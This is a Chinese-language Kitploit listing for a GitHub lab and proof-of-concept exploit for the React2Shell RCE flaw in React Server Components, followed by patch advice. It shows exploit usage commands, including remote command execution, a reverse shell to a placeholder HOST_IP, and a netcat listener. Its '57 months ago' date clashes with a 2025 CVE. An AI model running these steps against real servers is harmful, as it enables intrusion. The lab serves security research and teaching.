Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-55182-poc — CVE-2025-55182(React2Shell)的实验室环境与PoC漏洞利用程序,这是React Server Components中的一个严重RCE漏洞。包含易受攻击的应用、漏洞利用脚本和扫描器,用于安全研究与教育。 | Kitploit
工具/GitHubGitHub/mooowu/cve-2025-55182-poc
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育远程访问工具Payload 开发实验室与实践
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

CVE-2025-55182(React2Shell)的实验室环境与PoC漏洞利用程序,这是React Server Components中的一个严重RCE漏洞。包含易受攻击的应用、漏洞利用脚本和扫描器,用于安全研究与教育。

57个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

CVE-2025-55182 (React2Shell) 漏洞分析实验室

本仓库提供了一个完整的环境,用于分析和复现 CVE-2025-55182,这是一个影响 React 19.x 和 Next.js 15.x 的 React 服务端组件 (RSC) 中的严重远程代码执行 (RCE) 漏洞。

⚠️ 警告:本项目故意包含存在漏洞的代码。请勿将其部署到公共服务器或生产环境中。

🔍 漏洞概述

  • CVE ID: CVE-2025-55182
  • 别名: React2Shell
  • CVSS 评分: 10.0 (严重)
  • 漏洞类型: CWE-502 (不可信数据的反序列化)
  • 受影响组件:
    • React 服务端组件 (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

原理

该漏洞存在于 React 服务端组件运行时处理来自 HTTP 请求(服务端操作)的序列化数据的方式中。攻击者可以构造恶意的 "Flight" 协议载荷,当服务端对其进行反序列化时,会在身份验证检查之前执行任意代码。

📂 项目结构

root@kitploit:~
react2shell/
├── vulnerable-app/       # 存在漏洞的 Next.js 15 应用
│   ├── app/
│   │   ├── actions.ts    # 存在漏洞的服务端操作
│   │   └── page.tsx      # 用于测试漏洞的 UI
│   ├── Dockerfile        # 容器定义
│   └── package.json
├── exploit/              # 利用工具
│   ├── exploit.py        # Python PoC 漏洞利用
│   ├── scanner.py        # 漏洞扫描器
│   └── quick_exploit.sh  # 简单的 bash 漏洞利用
├── docs/                 # 分析文档
└── docker-compose.yml    # 隔离的实验室环境

🚀 快速开始

前提条件

  • Docker 和 Docker Compose
  • Python 3.x (用于在本地运行漏洞利用)

1. 启动实验室环境

在隔离的容器中运行存在漏洞的应用:

root@kitploit:~
docker-compose up -d --build

应用将在 http://localhost:3000 可用。

2. 验证应用

在浏览器中访问 http://localhost:3000。您应该会看到 "React2Shell Lab" 界面,其中包含多个测试面板:

  • 命令执行: 测试直接命令注入
  • 不安全反序列化: 测试基于 JSON 的反序列化漏洞利用
  • 任意文件读取: 测试路径遍历
  • 系统信息: 查看系统详情(以验证 RCE 影响)

⚔️ 漏洞利用

我们提供了多种工具来测试该漏洞。

使用 Python 漏洞利用

  1. 安装依赖:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. 检查是否存在漏洞:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. 执行命令:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. 反向 Shell (需要监听器,例如 nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

使用扫描器

扫描存在漏洞的 React/Next.js 实例:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ 缓解措施

要在您自己的应用中修复此漏洞:

  1. 升级依赖:

    • 将 React 升级到 19.3.0 或更高版本。
    • 根据您的分支,将 Next.js 升级到 15.0.5、15.1.9 或 16.0.8。
  2. 验证补丁: 检查 package.json 以确保 react-server-dom-* 包已更新。

📝 免责声明

本项目仅供教育目的和安全研究使用。作者对滥用本材料不承担任何责任。

下载工具